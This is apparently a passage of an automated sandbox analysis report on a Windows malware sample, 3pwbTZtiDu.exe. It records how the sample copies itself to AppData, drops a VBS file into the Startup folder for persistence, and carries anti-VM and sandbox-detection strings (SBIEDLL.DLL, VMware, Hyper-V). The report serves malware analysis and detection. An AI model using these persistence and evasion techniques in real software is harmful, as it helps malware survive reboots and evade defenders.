                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AC4A70 push eax; iretd 0_2_05AC5021
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05B9B5D9 push eax; retf 0_2_05B9B5DA
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C6CA4C pushad ; retf 0_2_05C6CA4D
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB1715 push ss; retf 0_2_05CB1716
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB16D9 push ss; retf 0_2_05CB16DA
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB112B push ss; retf 0_2_05CB114A
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB98FC pushfd ; retf 0_2_05CB98FD
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB5B10 push 00000055h; retf 0_2_05CB5B12
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB5B17 push ecx; retf 0_2_05CB5B1E
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB5B15 push esp; retf 0_2_05CB5B16
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB5AC7 push ecx; retf 0_2_05CB5B1E
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB5ADD push ebp; retf 0_2_05CB5ADE
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB5AF3 push ebp; retf 0_2_05CB5B06
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB5A8B push ebp; retf 0_2_05CB5A96
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB5ABF push ebp; retf 0_2_05CB5AC6
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB6A1B pushad ; retf 0_2_05CB6A21
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0099321F push edi; iretd 9_2_00993222
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0562CC98 pushad ; ret 9_2_0562CCA1
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057ECA4C pushad ; retf 9_2_057ECA4D
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeFile created: C:\Users\user\AppData\Roaming\DisplayName.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbsJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbsJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: 3pwbTZtiDu.exe PID: 6656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DisplayName.exe PID: 5600, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002857000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.00000000024D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeMemory allocated: 4810000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeMemory allocated: 950000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeMemory allocated: 2290000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: DisplayName.exe, 00000009.00000002.2771699318.00000000006E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 6e d0 59 6b 97 52-b4 9a 7f 42 1f 0e 66 9c
                  Source: wscript.exe, 00000008.00000002.2608571622.000001C1A2182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}u
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2591097026.0000000000A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
